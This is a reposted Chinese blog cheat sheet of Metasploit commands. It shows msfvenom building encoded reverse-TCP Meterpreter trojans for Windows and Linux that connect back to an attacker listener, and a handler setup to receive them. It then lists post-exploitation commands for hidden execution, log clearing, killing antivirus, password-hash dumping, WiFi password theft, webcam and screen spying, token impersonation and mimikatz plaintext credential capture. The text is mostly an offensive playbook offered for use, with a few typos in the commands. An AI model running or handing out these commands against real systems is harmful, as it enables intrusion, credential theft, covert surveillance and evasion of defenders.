欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

msf常用命令

程序员文章站 2022-07-10 21:36:57
msfvenom:生成payload工具常用参数:-l查看列表-p 指定payload-f指定输出格式-e指定一个编码方式-i 指定编码次数例如生成一个反向tcp的payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -e x86/shikata_ga_nai -I 5 -f exe > 1.exe上面是生成Windows可执行文件,也可以生成Li......

msfvenom:生成payload工具 

常用参数:-l查看列表

-p 指定payload

-f指定输出格式

-e指定一个编码方式

-i 指定编码次数

例如生成一个反向tcp的payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -e x86/shikata_ga_nai -I 5 -f exe > 1.exe

上面是生成Windows可执行文件,也可以生成Linux的可执行文件

Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -f elf > 1.elf

 

由上面生成的可执行木马文件可以上传至攻击方,令其执行在本地监听即可:

进入msfconsole

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.139.130

   set LPORT 4444

  exploit

然后再被攻击的电脑执行即可获得meterpreter会话窗口:

msf常用命令

 

基础命令

返回命令:background

查看所有会话命令:sessions -l

 pessions -i:与指定的会话进行交互

 pwd:查看目标当前那目录

 lpwd:本地的当前目录

 cd :切换指定目录

 lcd :切换本地指定目录

 ls :列出目标的文件

 lls :列出本机当前目录文件

 clearev : 清理痕迹

 download :将目标文件下载到本地

  upload:上传至目标当前目录 :upload 1.exe

  execute:在目标执行命令的功能 隐藏执行:execute -f 目标.exe -H

 ps : 列出目标进程

 getuid: 查看当前用户的身份

 getprivs:查看当前权限

 migrate :进程迁移

 getpid :查看木马进程

 shell :进入目标终端环境 会有乱码

 chcp 65001解决乱码问题

 idletime :查看目标服务空闲时间

 sysinfo : 查看目标信息

 shutdown:关机

 reboot :重启

 netstat:查看网络连接情况

 ipconfig:查看目标IP信息

 getsystem:尝试提权

 killav :杀死杀毒软件

 run hashdump :到处目标机的密码

 run post/windows/wlan/wlan_profile :查看wifi密码

 run vnc:实时屏幕监控

 run webcam :开启一个摄像头

 run post/windows/gather/checkvm:查看是否为虚拟机

  run post/windows/gather/enum_computers :查看域内主机

 run post/windows/manage/enable_edp:开启对方远程桌面3389

 利用help可了解更多

 load incognito 然后使用 list_tokens -u 列出令牌

 impersonate_token HP-43003395852D\\Administrator :获取指定权限记住要加两个\

 mimikatz: load mimikatz进入

 help查看帮助

 wdigest:抓取明文密码

 更新命令:apt update

 apt install metasploit-framework

 

本文地址:https://blog.csdn.net/LTtiandd/article/details/107348015